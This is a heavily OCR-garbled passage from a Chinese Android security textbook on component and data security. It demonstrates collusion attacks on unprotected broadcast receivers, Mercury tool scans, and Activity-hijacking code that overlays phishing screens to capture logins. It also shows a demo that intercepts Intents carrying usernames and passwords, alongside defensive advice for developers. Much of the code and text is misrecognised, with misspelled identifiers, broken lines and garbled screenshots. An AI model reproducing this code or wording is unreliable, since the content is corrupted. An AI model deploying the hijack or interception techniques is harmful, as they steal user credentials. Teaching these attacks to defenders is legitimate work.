ntent, putExtra(" ， 
"http://developer.android.com/images/home/android-jellybean.png"); 
// 要 下 载 的 文件 URL 
string fileName = "jb.png"; // 保 存 的 文件 名 
intent.putExtra("filename", fileName); 
sendBroadcast (intent);  // 发 送 广 播 
} 
让 


当 EvilDownloader 实 例 的 下 载 文件 按钮 被 点 击 ， 以 上 代码 就 会 执 


行 ，DownloadReceiver 收 到 广播 后 就 开始 下 载 文件 ， 如 图 11-6 所 示 ， 一 
次 完美 的 串 谋 攻击 就 完成 了 。 
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图 11-6 ”模拟 串 谋 攻 击 


11.3.3 权限 攻击 检测 


串 谋 攻击 主要 针对 Android 系 统 的 可 访问 组 件 ， 因 此 防范 的 方法 是 
开发 人 员 在 编写 代码 时 为 组 件 添 加 访问 控制 权限 。 但 很 多 时 候 ， 我 们 不 


具备 源 代码 的 访问 权限 ， 尤 其 是 软件 测试 人 员 ， 他 们 的 职责 是 找 出 软件 
中 潜在 的 bug 与 安全 隐患 ， 在 测试 大 量 apk 时 ， 很 难 通过 直接 运行 或 及 编 
译 apk 找 出 安全 问题 所 在 。 这 种 情况 就 需要 借助 工具 来 完成 安全 检测 
和 

笔者 在 此 推荐 一 款 开 源 的 Android 平 台 安 全 评估 工具 Mercury， 它 除 
了 能 检查 组 件 权 限 提升 漏洞 外 ， 还 能 检测 Android 系 统 安全 漏 稠 。 该 工 
有 具 的 项 目 主 页 为 https:/github.com/mwrlabs/mercury， 目 前 最 新 版 本 为 
1.1， 官 方 编译 好 的 文件 的 下 载 地 址 为 
http://labs.mwrinfosecurity.com/assets/299/mercury-v1.1.zip。 

下 面 我 们 来 看 看 该 工具 是 如 何 检测 组 件 权限 提升 漏洞 的 。 将 下 载 好 
的 mercury-v1.1.zip 解 压 ， 然 后 在 AVD 上 安装 mercury-server.apk， 如 果 是 
在 手机 上 安装 ， 确 保 手 机 能 够 获取 root 权 限 。 安 装 好 后 启动 Mercury 程 
序 ， 点 击 界面 上 的 OFF 按 钮 启动 Mercury 服 务 ， 此 时 按钮 会 切换 为 ON 状 
态 ， 效 果 如 图 11-7 所 示 。 
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图 11-7 ”开始 Mercury 服 务 





PC 端的 Mercury 客 户 端 是 通过 Socket 与 AVD 上 的 服务 端 通讯 的 ， 在 
启动 客户 端 前 ， 需 要 在 PC 端的 命令 提示 符 下 执行 如 下 命令 开局 端口 转 
发 。 





adb, forward ECp:31415 tcpr31415 

31415 是 Mercury 使 用 的 默认 端口 。 命 令 执 行 完 后 就 可 以 启动 
Mercury 客 户 端 了 ， 在 命令 提示 符 下 执行 mercury.py 会 进入 Mercury 的 
Shell 环 境 ， 如 图 11-8 所 示 。 


c C:\WINDOYS\systenm32\cnd. exe 一 mercury. py 


NmeprcuPy-ul .1\client nercury.py 


sa 


RR 
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mercury> 


图 11-8 ”Mercury Shell 环 境 


在 Shell 环 境 下 执行 “connect 127.0.0.1” 来 连接 服务 端 ， 连 接 成 功 后 输 
入 help 查 看 可 以 使 用 的 命令 。 以 上 一 小 节 的 串 谋 攻击 为 例 ， 我 们 需要 查 
看 的 是 没有 设置 权限 的 广播 接收 者 ， 因 此 执行 broadcast 命 令 ， 执 行 完 后 
输入 help 查 看 可 以 使 用 的 命令 (Mercury 所 有 的 命令 都 支持 使 用 help 查 看 
其 使 用 帮助 ，， 查 看 所 有 的 广播 接收 者 可 以 执行 info 命 令 ， 下面 是 笔者 
执行 info 的 输出 信息 。 











*mercury#broadcast> info 
Package name: com.android.launcher 
Receiver: com.android.launcher2.InstallShortcutReceiver 


Required Permission: com.android.launcher.permission.INSTALL SHORTCUT 


Package name: com.android.launcher 
Receiver: com.android.launcher2.UninstallShortcutReceiver 


Required Permission: com.android.launcher.permission.UNINSTALL SHORTCUT 


Package name: com.android.quicksearchbox 

Receiver: com.android.quicksearchbox.CorporaUpdateReceiver 
Required Permission: null 

Package name: com.android.deskclock 

Receiver: com.android.alarmclock.AnalogAppWidgetProvider 


Required Permission: null 


Package name: com.droider.downloadmanager 
Receiver: com.droider.downloadmanager.DownloadReceiver 


Required Permission: null 


从 输出 信息 中 可 以 一 眼看 出 ，downloadmanager 程 序 的 


DownloadReceiver 广 播 接 收 者 不 需要 权限 就 可 以 调用 。 下 面 我 们 使 用 
send 命 令 发 送 一 条 Action 为 “com.droider.download” 的 广播 ， 来 模拟 一 次 
串 谋 权限 攻击 。 执 行 以 下 命令 〈 注 意 是 1 行 ) : 


send --action com.droider.download -extrastring 
"url"="http://developer.android.com/images/home/android-jellybean.png" 


"filename"="jb.png" 


命令 执行 后 AVD 上 的 downloadmanager 有 了 反应 ， 效 果 如 图 11-9 所 
说 明 此 时 发 现 了 一 处 安全 漏洞 。 
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图 11-9 DownloadReceiver 广 播 接收 者 被 执行 


Mercury 的 其 它 功 能 笔者 在 此 就 不 介绍 了 ， 读 者 可 以 自己 慢 慢 去 摸 
索 。 全 于 如 何 防 范 权限 攻击 ， 我 们 将 在 下 一 小 节 Android 组 件 安全 中 介 


绍 。 


11.4 _ Android 组 件 安 全 


Android 组 件 包括 Activity、Broadcast Receiver、Service、Content 
Provider。 它 们 是 Android 软 件 开发 人 员 每 天 接触 到 的 东西 。 本 小 节 主 要 
介绍 使 用 Android 组 件 时 ， 可 能 会 产生 的 安全 问题 ， 以 及 如 何 对 它们 进 
行 防范 。 


11.4.1 Activity 安 全 及 Activity 动 持 演示 


Activity 组 件 是 用 户 唯 一 能 够 看 见 的 组 件 ， 作 为 软件 所 有 功能 的 显 
示 载 体 ， 其 安全 问题 是 最 应 该 受到 关注 的 。Activity 安 全 首先 要 讨论 的 
是 访问 权限 控制 ， 正 如 Android 开 发 文档 中 所 说 的 ，Android 系 统 组 件 在 
指定 Intent 过 滤器 〈intent-filter) 后 ， 默 认 是 可 以 被 外 部 程序 访问 的 。 可 
以 被 外 部 访问 就 意味 痢 可 能 被 其 它 程序 用 来 进行 串 谋 攻击 ， 那 如 何 防止 
Activity 被 外 部 调用 呢 ? 

Android 所 有 组 件 声明 时 可 以 通过 指定 android:exported 属 性 值 为 
false， 来 设置 组 件 不 能 被 外 部 程序 调用 。 这 里 的 外 部 程序 是 指 签名 不 
同 、 用 户 ID 不 同 的 程序 ， 签 名 相同 且 用 户 ID 相同 的 程序 在 执行 时 共享 同 
一 个 进程 空间 ， 人 彼此 之 间 是 没有 组 件 访问 限制 的 。 如 果 希 望 Activity 能 
够 被 特定 的 程序 访问 ， 束 不 能 使 用 android:exported 属 性 了 ， 可 以 使 用 
android:permission 属 性 来 指定 一 个 权限 字符 串 ， 例 如 下 面 的 Activity 声 
明 。 


<Activity android:name=" .MyActivity" 














android:permission="com.droider.permission.MyActivity"> 
<intent-filter> 

<action android:name="com.droider.action.work"></action> 
</intent-filter> 


</Activity> 


这 样 声 明 的 Activity 在 被 调用 时 ，Android 系 统 就 会 检查 调用 者 是 否 
具有 com.droider.permission.MyActivity 权 限 ， 如 果 不 具备 就 会 引发 一 个 
SecurityException 安 全 异常 。 要 想 启 动 该 Activity 必 须 在 
AndroidManifest.xml 文 件 中 加 入 下 面 这 行 声明 权 限 的 代码 。 


<uses-permission android:name=" com.droider.permission.MyActivity" /> 

除了 权限 攻击 外 ，Activity 还 有 一 个 安全 问题 ， 那 就 是 Activity 动 
持 。Activity 动 持 方 法 最 早 是 在 2011 年 的 一 次 安全 大 会 上 由 SpiderLabs 安 
全 小 组 公布 的 ， 从 受 影 响 的 角度 来 看 ，Activity 动 持 技 术 属 于 用 户 层 的 
安全 ， 程 序 员 是 无 法 控制 的 。 它 的 原理 如 下 : 当 用 户 安装 了 带 有 
Activity 劫 持 功 能 的 恶意 程序 后 ， 恶 意 程 序 会 般 历 系统 中 运行 的 程序 ， 
当 检 测 到 需要 支持 的 Activity (通常 是 网 银 或 其 它 网 络 程序 的 登录 页 
面 ) 在 前 台 运 行 时 ， 亚 意 程序 会 启动 一 个 带 
FLAG_ACTIVITY_NEW_TASK 标 志 的 钓鱼 式 Activity 上 履 兰 正 第 的 
Activity， 从 而 欺骗 用 户 输 入 用 户 名 或 密码 信息 ， 当 用 户 输 入 完 信息 
后 ， 和 恶意 程序 会 将 信息 发 送 到 指定 的 网 址 或 邮箱 ， 然 后 切换 到 正 第 的 
Activity 中 去 。 

Activity 动 持 对 于 用 户 操作 来 说 几乎 是 透明 的 ， 和 危害 性 也 可 想 而 
知 ， 本 小 节 的 实例 HijackActivity 就 是 一 个 Activity 动 持 演 示 程 序 ， 运 行 
后 界面 如 图 11-10 所 示 。 


























Activity 动 持 演示 程序 





劫持 的 进程 列表 : 
com.android.music 
com.android.browser 




















图 11-10 ”Activity 劫持 演示 程序 


HijackActivity 实 例 可 以 对 多 个 进程 进行 支持 ， 它 在 启动 时 启动 了 一 
个 Hijacker 服 务 ，Hijacker 服 务 创建 了 一 个 定时 器 ， 定 时 器 每 隔 2 秒 就 检 
测 一 次 系统 正在 运行 的 进程 ， 判 断 前 台 运 行 的 进程 在 劫持 的 进程 列表 中 
是 个 有 匹配 项 ， 如 果 有 就 对 其 进行 劫持 。 它 的 代码 如 下 。 








private TimerTask mTask = new TimerTask() { 


@Override 
public void run() { 
// TODO Auto-generated method stub 
ActivityManager am = (ActivityManager) getSystemService(Context. 


ACTIVITY_SERVICE); 
List<RuNnningAppProcessInfo> infos = am.getRunningAppProcesses(); 


// 枚 举 进程 
for (RuNningAppProcessInfo psinfo : infos) { 
if (psinfo.importance == RunningAppProcessInfo.IMPORTANCE_ 


FOREGROUND) { // 前 台 进 程 
if (mhijackingList.contains(psinfo.processName)) { 
Intent intent = new Intent (getBaseContext(), 
HijackActivity.class); 
intent.addFlags (Intent.FLAG ACTIVITY NEW_TASK); 
intent.putExtra("processname", psinfo.processName); 
getApplication() .startActivity (intent); // 启 动 伪造 的 Activity 


下 
现在 在 AVD 中 启动 Music 或 Browser 应 用 都 将 被 HijackActivity 动 持 ， 


效果 如 图 11-11 所 示 。 
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图 11-11 ”HijackActivity 成 功 动 持 Music 应 用 


Activity 动 持 不 需要 在 AndroidManifest.xml 中 声明 任何 权限 就 可 以 实 
现 ， 一 般 的 防 病毒 软件 无 法 检测 ， 手 机 用 户 更 是 防不胜防 ， 目 前 也 没有 
什么 好 的 防范 方法 ， 不 过 有 个 简单 的 方法 就 是 查看 最 近 运 行 过 的 程序 列 
表 ， 通 过 最 后 运行 的 程序 来 判断 Activity 是 否 被 劫持 过 ， 方 法 是 : 长 按 
Home 键 不 放 ， 系 统 会 显示 最 近 运 行 过 的 程序 列表 。 如 图 11-12 所 示 ， 笔 
者 在 点 击 Browser 应 用 后 ， 最 近 运 行 过 的 程序 列表 中 ，HijackActivity 却 
显示 在 了 最 前 面 ， 很 显然 这 个 程序 有 劫持 Activity 的 嫌疑 。 
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图 11-12 ”查看 最 近 运行 过 的 程序 
这 种 检测 Activity 动 持 的 方法 也 不 是 在 任何 时 候 都 有 效 的 ， 在 声明 
Activity 时 ， 如 果 设 置 属性 android:excludeFromRecents 的 值 为 tue， 程 序 
在 运行 时 就 不 会 显示 在 最 近 运 行 过 的 程序 列表 中 ， 上 面 的 检测 方法 上 自然 
也 就 失效 了 。 











11.4.2 Broadcast Receiver 安 全 


Broadcast ” Receiver 中文 被 称 为 广播 接收 者 ， 用 于 处 理 接收 到 的 广 
播 ， 广播 接 收 者 的 安全 分 为 发 送 安 全 与 接收 安全 两 个 方面 。 

Android 系 统 中 的 广播 有 个 特点 : 多 数 情 况 下 广播 是 使 用 Action 来 标 
识 其 用 途 ， 然 后 由 sendBroadcast() 方 法 发 出 的 ， 系 统 中 所 有 啊 应 该 
Action 的 广播 接收 者 都 能 够 接收 到 该 广播 。 在 AndroidManifest.xml 中 ， 
组 件 的 Action 是 通过 Intent 过 滤器 (intent-filter〉 来 设置 的 ， 使 用 了 Intent 
过 滤器 的 Android 组 件 默 认 情 况 下 都 是 可 以 被 外 部 访问 的 ， 这 个 安全 问 
题 在 11.3.2 节 的 串 谋 攻击 中 已 经 演示 了 ， 解 决 方法 就 是 在 组 件 声明 时 设 
置 它 的 android:exported 属 性 为 false， 让 广播 接收 者 只 能 接收 本 程序 组 件 
发 出 的 广播 。 

下 面 我 们 重点 要 谈 的 是 广播 接收 者 的 发 送 安全 问题 。 我 们 驳 来 看 一 
段 广 播 友 送 代码 。 


Intent intent = new Intent() ; // 创 建 Intent 对 象 








intent.setAction("com.droider.workbroadcast"); 
intent .putExtra("data", Math.random()); / /使 用 随机 值 模拟 后 台 软 件数 据 


sendBroadcast (intent) / /发 送 广 播 


这 样 的 代码 我 想 很 多 读者 不 会 感到 陌生 ， 这 段 代码 发 送 了 一 个 
Action 为 com.droider.workbroadcast 的 广播 。 我 们 先 来 看 看 广播 接收 者 是 
如 何 啊 应 广播 接收 的 ，Android 系 统 提 供 了 两 种 广播 发 送 方法 ， 分 别 是 
sendBroadcast() 与 sendOrderedBroadcast()。sendBroadcastO 用 于 发 送 无 序 
广播 ， 无 序 广播 能 够 被 所 有 的 广播 接收 者 接收 ， 并 且 不 能 被 
abortBroadcast0 中 止 ，sendOrderedBroadcastO 用 于 发 送 有 序 广播 ， 有 序 
广播 被 优先 级 高 的 广播 接收 者 优先 接收 ， 然 后 依次 同 下 传递 ， 优 先 级 高 
的 广播 接收 者 可 以 算 改 广播 ， 或 者 调用 abortBroadcastO) 中 止 广播 。 广播 
优先 级 啊 应 的 计算 方法 是 : 动态 注册 的 广播 接收 者 比 静 态 广 播 接收 者 的 
优先 级 高 ， 静 态 广 播 接 收 者 的 优先 级 根据 设置 的 android:priority 属 性 的 
数值 决定 ， 数 值 越 大 ， 优 先 级 越 高 ， 优 先 级 最 大 取 值 为 1000。 

运行 本 小 节 的 实例 BroadcastReceiver， 点 击 “ 开 始 广 播 ” 按 钮 后 ， 程 




















序 会 使 用 sendBroadcast() 每 5 秒 发 出 一 条 广播 ，DataReceiver 在 接收 到 广 
播 后 会 弹出 接收 到 的 广播 数据 ， 效 果 如 图 11-13 所 示 。 


吓 5554:Android2. 3. 3 了 


正 营 广 擂 接 收 者 程序 


收 到 的 数据 :0.4807230404428836 





图 11-13 广播 接收 者 


实例 程序 想 要 完成 的 功能 是 在 自己 的 组 件 之 间 通 过 广播 进行 数据 传 
递 ， 发 送 的 内 容 并 不 想 让 第 三 方程 序 获 得 ， 但 现实 情况 下 这 样 的 实现 方 
式 并 不 安全 。 现 在 运行 本 小 节 的 实例 StealBroadcastReceiver， 该 实例 动 
态 注 册 了 一 个 Action 为 com.droider.workbroadcast 的 广播 接收 者 ， 并 且 拥 
有 最 高 的 优先 级 ， 程 序 在 运行 时 就 优先 接收 到 了 BroadcastReceiver 实 例 








发 送 的 广播 ， 如 图 11-14 所 示 。 


| 555d4:Arndroid2.3.3 
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Broadcast Receiver 安 全 演示 程序 


偷窃 到 的 数据 :0.8457389434744207 


图 11-14 ”StealBroadcastReceiver 实 例 优先 接收 到 广播 


由 于 是 使 用 sendBroadcast() 发 送 的 广播 ， 因 此 无 法 通过 
abortBroadcastO0 中 止 ， 只 能 够 优先 啊 应 BroadcastReceiver 实 例 发 送 的 广 
播 ， 但 如 果 程 序 中 使 用 的 是 sendOrderedBroadcastO 发 送 广播 ， 那 危害 可 
就 大 了 ， 很 有 可 能 BroadcastReceiver 实 例 永 远 都 无 法 收 到 自己 发 出 的 广 
播 ! 

下 面 来 看 看 解决 方案 。 发 送 广 播 时 可 以 通过 Intent 指 定 具体 要 发 送 


到 的 Android 组 件 或 类 ， 例 如 本 实例 在 创建 广播 mtent 时 ， 加 入 下 面 这 行 
人 代码， 广播 将 永远 只 能 被 本 实例 的 DataReceiver 接 收 。 


Intent .setClass (MainActivity.this, DataReceiver.class); 


11.4.3 ” Service 安全 


Service 组 件 是 Android 系 统 中 的 后 台 进 程 组 件 ， 主 要 的 功能 是 在 后 
台 进 行 一 些 耗 时 的 操作 。 与 其 它 的 Android 组 件 一 样 ， 当 声明 Service 时 
指定 了 Intent 过 滤器 ， 该 Service 默 认 束 可 以 被 外 部 访问 。 可 以 访问 的 方 
i 

startService(): 启动 服务 ， 可 以 被 用 来 实现 串 谋 攻 击 。 

bindService(): 绑 定 服务 ， 可 以 被 用 来 实现 串 谋 攻击 。 

stopService(): 停止 服务 ， 对 程序 功能 进行 恶意 人 破坏。 

串 谋 攻击 前 面 已 经 介绍 过 了 ， 本 小 节 就 不 再 给 出 实例 程序 了 。 而 对 
于 恶意 的 stopService0， 程 序 是 深恶痛绝 的 ， 它 破解 程序 的 执行 环境 ， 
直接 影响 到 程序 的 正常 运行 ， 要 想 杜 绝 Service 组 件 被 人 恶意 的 启动 或 停 
止 ， 就 需要 使 用 Android 系 统 的 权限 机 制 来 对 调用 者 进行 控制 。 如 果 
Service 组 件 不 想 被 程序 外 的 其 它 组 件 访问 ， 可 以 直接 设置 它 的 
android:exported 属 性 为 false， 如 果 是 同一 作者 的 多 个 程序 共享 使 用 该 服 
务 ， 则 可 以 使 用 自 定 义 权 限 ， 例 如 下 面 的 服务 声明 。 


<service android:name=" .MyService" 

















android:permission="droider.permission.ACCESS MYSERVICE"> 
<intent-filter > 

<action android:name="android.intent.droider.MyService"/> 
</intent-filter> 


</service> 

这 样 声 明 的 MyService 服 务 ， 被 外 部 程序 调用 时 ， 系 统 就 会 检查 调 
用 者 的 权限 ， 如 果 没 有 指定 droider.permission.ACCESS_MYSERVICE 权 
限 ， 就 会 抛 出 一 个 SecurityException 异 常 ， 导 致 程序 退出 。 


11.4.4 ”Content Provider 安 全 


Content Provider 中 文 称 为 内 容 提供 者 ， 它 用 于 程序 之 间 的 数据 区 
换 。Android 系 统 中 ， 每 个 应 用 的 数据 库 、 文 件 、 资 源 等 信息 都 是 私有 
的 ， 其 它 的 程序 无 法 访问 ， 如 果 想 要 访问 这 些 数据 ， 束 必须 提供 一 种 程 
序 之 间 数 据 的 访问 机 制 ， 这 残 是 Content Provider 的 由 来 ，Content 
Provider 通 过 提供 存储 与 查询 数据 的 接口 来 实现 进程 之 间 的 数据 共享 ， 
例如 系统 中 的 电话 籍 、 短 信息 我 们 在 程序 中 都 是 通过 Content Provider 来 
访问 的 。 

一 个 典型 的 Content Provider 的 声明 如 下 。 


<provider 











android:name="com.droider.myapp.FileProvider" 

android:authorities="com.droider.myapp.fileprovider" 

android:readPermission="droider .permission.FILE READ" 

android:writePermission="droider.permission.FILE WRITE" > 
</provider> 


Content Provider 提 供 了 insert()、delete()、update()、gquery0 等 操作 ， 
其 中 执行 queryO 碍 询 操作 时 会 进行 谈 权 限 android:readPermission 检 碍 ， 
其 它 的 操作 会 进行 号 权限 android:writePermission 检 查 ， 权 限 检 查 失 败 时 
会 抛 出 SecurityException 异 常 。 对 于 很 多 开发 人 员 来 说 ， 在 声明 Content 
Provider 时 几乎 从 来 不 使 用 这 两 个 权限 ， 这 就 导致 了 串 谋 攻击 发 生 的 可 
能 。 部 分 网 络 软 件 开 发 商 使 用 Content Provider 来 实现 软件 登录 、 用 户 密 
码 修改 等 敏感 度 极 高 的 操作 ， 然 而 声明 的 Content Provider 却 没有 权限 控 
制 ， 这 使 得 一 些 恶 意 软 件 无 需 任何 权限 束 可 以 获取 用 户 的 敏感 信息 。 











11.5 ”数据 安全 


Android 手 机 中 存放 着 许多 与 用 户 个 人 相关 的 数据 ， 例 如 : 手机 号 
码 、 通 讯 录 、 短 信息 、 聊 天 记录 、 电 子 邮件 、 网 络 软件 的 账号 密码 等 
等 。 这 些 数据 都 是 用 户 的 隐私 ， 是 神 茎 而 不 可 侵犯 的 ， 然 而 在 现实 中 ， 
这 些 数据 的 存储 并 没有 我 们 想象 的 那么 安全 。 本 节 我 们 主要 从 编程 的 角 
度 出 用， 来 看 看 数据 安全 问题 是 怎么 产生 的 。 


11.5.1 ”外 部 存储 安全 


数据 安全 的 首 个 安全 问题 就 是 数据 的 存储 ， 用 户 的 隐私 数据 处 理 的 
不 好 ， 就 会 暴露 给 系统 中 所 有 的 软件 ， 这 是 最 不 应 该 却 经 常 发 生 的 事 
情 。Android SDK 中 提供 了 一 种 最 简单 的 数据 存储 方式 。 那 就 是 外 部 存 
储 ， 外 部 存储 是 所 有 存储 方式 中 安全 隐患 最 大 的 ， 任 何 软件 只 需要 在 
AndroidManifest.xml 中 声明 如 下 一 行 权限 ， 就 可 以 读 写 外 部 存储 设备 。 


<uses-permission android:name="android.permission.WRITE EXTERNAL STORAGE"/> 

外 部 存储 的 方式 是 直接 使 用 File 类 在 外 部 存储 设备 上 读 写 文件 ， 例 
如 在 SD 内 存 卡 上 创建 一 个 config.txt 文 件 ， 并 往 其 中 写 入 “Hello World” 的 
代码 如 下 。 


File configFile = new File("/sdcard/config.txt"); 


























FileOutputStream os; 

try 1 
os = new FileOutputSstream(configFile),; 
os.write("Hello World" .getBytes()); 
os.close(); 

} catch (Exception e) { 


e.printStackTrace(); 


对 于 上 面 生成 的 config.txt 文 件 ， 其 它 软 件 只 要 拥有 内 存 卡 读 写 权 
限 ， 束 可 以 访问 它 的 内 容 。 正 如 您 所 看 到 的 ， 外 部 存储 的 数据 是 完全 其 
圳 的 ， 这 残 给 很 多 恶意 的 软件 留 下 了 获取 其 它 软 件数 据 的 可 乘 之 机 。 国 
内 有 些 IM 软 件 ， 较 早 的 版 本 中 聊天 记录 束 是 存放 在 外 部 SD 卡 上 的 ， 而 
且 数 据 也 没有 加 密 ， 这 束 是 典型 的 由 第 三 方 软件 造成 的 隐私 泄露 。 

面 对 这 个 问题 ， 笔 者 在 此 建议 ， 对 于 不 涉及 用 户 隐私 的 数据 ， 可 以 
适当 地 采用 外 部 存储 来 保存 ， 但 只 要 涉及 到 用 户 隐私 的 ， 哪 介 是 数据 经 
过 加 密 了 ， 也 最 好 不 要 放 到 外 部 存储 设备 上 ， 因 为 分 析 人 员 要 是 掌握 了 
软件 数据 的 解密 方法 ， 同 样 可 以 简单 地 获取 用 户 隐私 。 


11.5.2 ”内 部 存储 安全 


其 次 是 内 部 存储 ， 它 是 所 有 软件 存放 私有 数据 的 地 方 。Android 
SDK 中 提供 了 openFileInput() 与 openFileOutput() 方 法 来 读 写 程序 的 私有 
数据 目录 。 一 段 常见 的 使 用 内 部 存储 保存 数据 的 代码 如 下 。 


try { 
FileOutputSstream fos = openFileOutput ("config.txt", MODE_PRIVATE); 

















fos.write("Hello World" .getBytes () ) ; 
fos.close!(); 
} catch (Exception e) { 


e.printSstackTrace(); 





} 

openFileOutput() 方 法 的 第 2 个 参数 指定 了 文件 创建 的 模式 ， 如 果 指 
定 为 MODE_PRIVATE， 表 明 该 文件 不 能 够 被 其 它 程 序 访 问 ，Android 系 
统 又 是 如 何 控制 上 面 生 成 的 config.txt 不 能 被 其 它 程序 访问 的 呢 ? 下 面 我 
们 进入 adb shell 中 看 看 config.txt 文 件 的 权限 。 如 图 11-15 所 示 ，config.txt 
文件 属于 app_45 用 户 ， 并 且 只 能 被 app_45 用 户 组 与 自身 进行 读 写 操作 。 
Android 系 统 为 每 个 程序 分 配 了 一 个 独立 的 用 户 与 用 户 组 ， 因 此 可 以 看 
出 ，Android 内 部 存储 的 访问 是 通过 Linux 文 件 访问 权限 机 制 控制 的 。 








cC:XEWINDOEWSVsS7sStea32Ycad. exze 一 adb Shel1l 


Microsoft Windows *P [人 本 5-1.26081] 
<C) 版 权 卫 有 1985-2901 Microsoft Corp- 


CG:\Documents and Settings Mdministrator>2>adb shell 

cd /data/data/com.droider .writeinternalstorage/files 

cd /data/data/com.droider.writeinternalstorage/files 

二 

1 

-PW—FW———— app._45 app_45 11 20812-108-16 19:93 config.txt 











图 11-15 ”config.txt 的 文件 权限 


下 面 尝 试 将 MODE_PRIVATE 更 改 为 
MODE _ WORLD _READABLE， 然 后 在 命令 提示 符 下 查看 其 文件 权限 。 
如 图 11-16 所 示 ， 文 件 允 许 其 它 用 户 进行 读 操 作 。 


cC:AEINDOTWSVS7Stea32Vcad. exe 一 adb shel1 





Documents and SettingsNhdministFatokr>adhb shel1ll 

提 cd Adata/data/com.droider.writeinternalstorage/files 

cd /data/data/com.droider .writeinternalstorage/files 

Te = 上 

1s 一 上 

ru—rw app_45 app_45 1ii 2012-19-t6 10:863 config.txt 


app_45 11 2812-108-16 19:11 config.txt 











图 11-16 ”config.txt 的 文件 权限 


当 内 部 存储 文件 可 以 被 外 部 访问 时 ， 可 以 使 用 以 下 代码 来 获取 它 的 





try { 
Context context = createPackageContext ("com.droider.writeinternalstorage", 
Context .CONTEXT_IGNORE_SECURITY) ; 
FileInputStream fis = context.openFileIinput ("Cconfig .七 xt" ) ; 
StringBuffer sb=new StringBuftfter(): 
BufferedReader br = new BufferedReader (new InputstreamReader (fis)); 
string data = ud 
while((data = br.readLine()) != null) { 
sb.append (data); 
了: 
fis.close!(); 
Toast .makeText (MainActivity.this, sb.toSstring(), Toast.LENGTH_SHORT). 
show(); 
} catch (Exception e) { 
e.printSstackTrace(); 


} 


createPackageContext() 方 法 允许 程序 创建 其 它 程序 包 的 上 下 文 
(CContext 对 象 ) ， 通 过 这 个 Context， 可 以 启动 其 它 程 序 的 Activity、 访 
问 其 它 程序 的 私有 数据 。 但 前 提 条 件 是 ， 其 它 程序 赋予 了 相应 的 权限 ， 
不 会 引发 安全 异常 。Context.CONTEXT_IGNORE_SECURITY 指 定 忽略 
创建 Context 时 的 安全 异常 ， 始 终 创建 Context 对 象 。 

从 上 面 可 以 看 出 ， openFileOutputO 创 建文 件 时 ， 第 2 个 模式 参 
数 是 引发 安全 隐患 的 关键 。 很 多 读者 可 能 会 说 : 我 在 使 用 这 个 方法 时 ， 
部 是 使 用 MODE_ PRIVATE 模 式 来 创建 文件 的 ， 你 所 说 的 安全 隐患 对 我 
来 说 完全 不 存在 。 其 实 ， 水 远 不 要 忽略 了 ， 程 序 可 能 通过 其 它 途径 获取 
高 访问 权限 ， 也 有 可 能 通过 系统 漏洞 提升 进程 权限 ， 用 户 的 手机 也 有 可 
能 已 经 ROOT， 这 些 情 况 下 恶意 程序 都 能 够 访问 到 软件 内 部 存储 的 数 
据 。 

Shared Proferences 与 Sqlite 数 据 库 同样 都 属于 内 部 存储 的 范畴 ， 只 是 
在 表现 形式 上 不 同 而 已 。 它 们 的 安全 问题 与 直接 使 用 内 部 文件 存储 的 安 
全 问题 是 一 样 的 。 

笔者 在 此 提醒 广大 的 软件 开发 人 员 ， 无 论 采 用 什么 样 数据 存储 方 

式 ， 存 储 用 户 隐 私 数 据 时 都 要 进行 加 密 ， 如 果 掉 以 轻 心 ， 就 有 可 能 造成 




















用 户 隐私 的 泄漏 。 
11.5.3 ”数据 通信 和 安全 


数据 通信 安全 是 指 软件 与 软件 ， 软 件 与 网 络 服 务 器 之 间 进 行 数据 通 
信 时 ， 所 引发 的 安全 问题 。 

首先 是 软件 与 软件 的 通信 ，Android 系 统 中 的 4 大 组 件 是 通信 的 主要 
手段 ， 而 通信 过 程 中 ， 数 据 的 传递 就 是 依靠 Intent 来 完成 。Intent 能 够 传 
递 所 有 基础 类 型 与 支持 序列 化 类 型 的 数据 ， 往 Intent 中 添加 数据 是 通过 
Intent 类 的 putExtra() 方 法 来 完成 的 。 例 如 本 小 节 实 例 saveInfo 中 有 如 下 代 











码 。 
Intent intent = new Intent(); / /创建 Intent 对 象 
intent.setAction("com.droider.saveinfo"); //Action 
intent .putExtra("username", "droider"); // 用 户 名 
intent .putExtra("password", "123456"); / /密码 
startService (intent); / /启动 服务 处 理 用 户 名 与 密码 
sendBroadcast (intent) ; // 发 送 广播 处 理 用 户 名 与 密码 


这 段 代码 中 通过 Intent 传 递 了 需要 保存 的 用 户 名 与 密码 ， 然 后 分 别 
通过 本 程序 的 Service、Broadcast Receiver 进 行 保存 处 理 。 理 想 情 况 下 ， 
运行 实例 程序 后 ， 效 果 如 图 11-17 所 示 〈 所 有 组 件 只 是 输出 了 接收 到 的 
用 户 名 与 密码 信息 ) 。 


tion ElConsole WH LoaCat 于 


EE FID TID Tag Text 


D 118054 18054 com. droider.saveinfo SaveInfoservice: droider -> l23456 
LD 118054 183064 com. droider.saveinfo SaveInfoReceiver: droider -> 123456 


图 11-17 程序 处 理 了 用 户 名 密码 保存 请 求 


然而 ， 由 于 Intent 中 没有 明确 指定 目的 组 件 的 名 称 ， 导 致 mtent 中 的 

















数据 可 能 被 第 三 方程 序 “ 偷 田 ”。 接 下 来 先 运行 本 小 节 的 stealinfo 实 例 ， 
然后 再 运行 saveInfo 实 例 ， 神 奇 的 一 幕 发 生 了 ， 如 图 11-18 所 示 ，Pntent 的 
数据 被 stealInfo 截 获 了 。 


tiar Console 沽 ) LoeCat 2 
下 FID TID Tag Text 
LD 121261 21261 com. droider. stealinfo SteallInfoService: droider -> 123456 
LD L21261 21261 com. droider. stealinfo stealInfoReceiver: droider -> 123456 


图 11-18 ”stealInfo 截 获 了 Intent 数 据 


虽然 saveInfo 实 例 中 有 处理 Action 为 “com.droider.saveinfo” 的 服务 与 
广播 接收 者 组 件 ， 但 由 于 启动 组 件 时 没有 指定 具体 的 组 件 名 称 ， 而 系统 
中 又 同时 存在 多 个 处 理 该 Action 的 组 件 ， 此 时 Android 系 统 就 会 选择 去 局 
动 优先 级 最 高 的 组 件 ， 最 先 局 动 的 程序 其 组 件 拥有 更 高 的 优先 权 ， 这 也 
就 是 为 什么 Intent 会 被 外 部 的 stealInfo 啊 应 的 原因 。 

这 个 安全 问题 在 讲解 Broadcast Receiver 组 件 安全 时 曾经 讲 过 ， 
Broadcast Receiver 由 于 其 自身 的 特殊 性 ， 使 用 sendBroadcastO 传 递 的 
Intent 本 号 就 是 暴露 的 ， 可 以 被 其 它 程序 获取 。 因 此 ， 它 的 安全 问题 是 
显而易见 的 ， 更 多 的 问题 可 能 是 啊 应 优先 级 的 争夺 。 而 其 它 的 组 件 束 不 
